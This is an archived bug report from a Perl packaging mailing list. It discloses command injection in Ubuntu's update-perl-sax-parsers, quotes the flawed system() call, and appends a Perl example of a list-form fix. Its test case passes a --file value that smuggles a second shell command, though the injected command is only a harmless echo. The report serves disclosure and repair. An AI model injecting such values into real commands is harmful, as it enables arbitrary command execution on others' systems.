
pkg-perl-maintainers team mailing list archive

[Bug 782479] [NEW] command injection in update-perl-sax-parsers

 

Public bug reported:

Binary package hint: libxml-sax-perl

/usr/bin/update-perl-sax-parsers has a command injection bug.

Test case:
emanuel@emanuel-desktop:/tmp$ /usr/bin/update-perl-sax-parsers --update --file " 2>/dev/null ;echo Systeminj;exit;" --ucf 1
update-perl-sax-parsers: Updating overall Perl SAX parser modules info file...
Systeminj

The bug can be found at:

    if ($ucf) {
        system("ucf --debconf-ok --sum-file /var/lib/libxml-sax-perl/ParserDetails.ini.md5sum $tmpfile $file");
        unlink $tmpfile or die("unlink $tmpfile: $!");
    }

** Affects: libxml-sax-perl (Ubuntu)
     Importance: Undecided
         Status: New

-- 
You received this bug notification because you are a member of Debian
Perl Group, which is subscribed to libxml-sax-perl in Ubuntu.
https://bugs.launchpad.net/bugs/782479

Title:
  command injection in update-perl-sax-parsers
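
The usual fix for the single-string `system()` call quoted in the report is to pass the command as a list, so no shell ever parses `$file`. The following is an added example, not part of the original report or the package's code; the `ucf_argv` and `capture` helpers, the absolute-path check and the sample paths are assumptions for illustration.

```perl
#!/usr/bin/perl
# Added example: not the code of update-perl-sax-parsers itself.
use strict;
use warnings;

# Build the ucf command as an argument list. The flags and the sum-file path
# are the ones in the report's snippet; a list is never parsed by a shell.
sub ucf_argv {
    my ($tmpfile, $file) = @_;
    # Assumption: --file should be an absolute path. This also keeps a value
    # starting with "-" from being read by ucf as an option.
    die "refusing suspicious --file value: $file\n" unless $file =~ m{\A/};
    return ('ucf', '--debconf-ok', '--sum-file',
            '/var/lib/libxml-sax-perl/ParserDetails.ini.md5sum',
            $tmpfile, $file);
}

# Run a command without a shell and capture its stdout (list-form pipe open).
sub capture {
    my @cmd = @_;
    open(my $fh, '-|', @cmd) or die "cannot run $cmd[0]: $!";
    my @out = <$fh>;
    close($fh) or die "$cmd[0] failed: status $?\n";
    return @out;
}

my $tmpfile = '/tmp/ParserDetails.ini.constructed';   # constructed sample path
my $hostile = ' 2>/dev/null ;echo Systeminj;exit;';   # value from the report

# Stand-in for ucf so the demo runs anywhere: prints one line per argument.
my @show = ($^X, '-e', 'print "[$_]\n" for @ARGV');

# List form: the hostile value arrives as one literal argument, nothing runs.
my @out = capture(@show, $tmpfile, $hostile);
print @out;
die "unexpected argument split\n" unless @out == 2;

# The path check rejects the same value before a ucf command is even built.
my @argv = eval { ucf_argv($tmpfile, $hostile) };
print "rejected: $@" if $@;

# A well-formed value (constructed) yields a plain argv for system(@argv).
print join(' | ', ucf_argv($tmpfile, '/tmp/ParserDetails.ini')), "\n";
```

In the script itself the call would become `system(ucf_argv($tmpfile, $file)) == 0 or die ...`, which also checks the exit status that the original call ignores.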

